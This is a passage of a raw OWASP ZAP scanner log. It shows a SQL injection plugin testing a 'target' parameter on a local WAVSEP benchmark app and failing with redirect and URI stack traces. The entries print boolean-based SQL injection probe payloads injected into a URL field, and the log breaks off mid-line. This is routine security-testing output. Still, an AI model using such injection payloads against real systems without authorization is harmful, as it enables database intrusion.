org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681604 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 8100=8100] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 8100=8100 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681605 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3479=1479] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3479=1479 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681605 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') AND 9954=1726 AND ('dzKU'='dzKU] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') AND 9954=1726 AND ('dzKU'='dzKU at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681606 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 2798=6781 AND ('qdRY'='qdRY] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 2798=6781 AND ('qdRY'='qdRY at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681606 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') AND 7343=7343 AND ('CDAh'='CDAh] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') AND 7343=7343 AND ('CDAh'='CDAh at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681607 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 8979=8979 AND ('BUkt'='BUkt] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 8979=8979 AND ('BUkt'='BUkt at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681608 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 2798=6781 AND ('qdRY'='qdRY] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 2798=6781 AND ('qdRY'='qdRY at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681609 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') AND 9954=1726 AND ('dzKU'='dzKU] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') AND 9954=1726 AND ('dzKU'='dzKU at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681610 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 1934=5197 AND 'lamF'='lamF] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 1934=5197 AND 'lamF'='lamF at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681611 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 8288=8288 AND 'TpaD'='TpaD] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 8288=8288 AND 'TpaD'='TpaD at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681611 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' AND 3678=8787 AND 'vNMA'='vNMA] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' AND 3678=8787 AND 'vNMA'='vNMA at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681613 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' AND 2638=2638 AND 'BKxK'='BKxK] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' AND 2638=2638 AND 'BKxK'='BKxK at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681613 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 1934=5197 AND 'lamF'='lamF] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 1934=5197 AND 'lamF'='lamF at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681613 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' AND 3678=8787 AND 'vNMA'='vNMA] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' AND 3678=8787 AND 'vNMA'='vNMA at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681615 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 8705=2884 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 8705=2884 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown 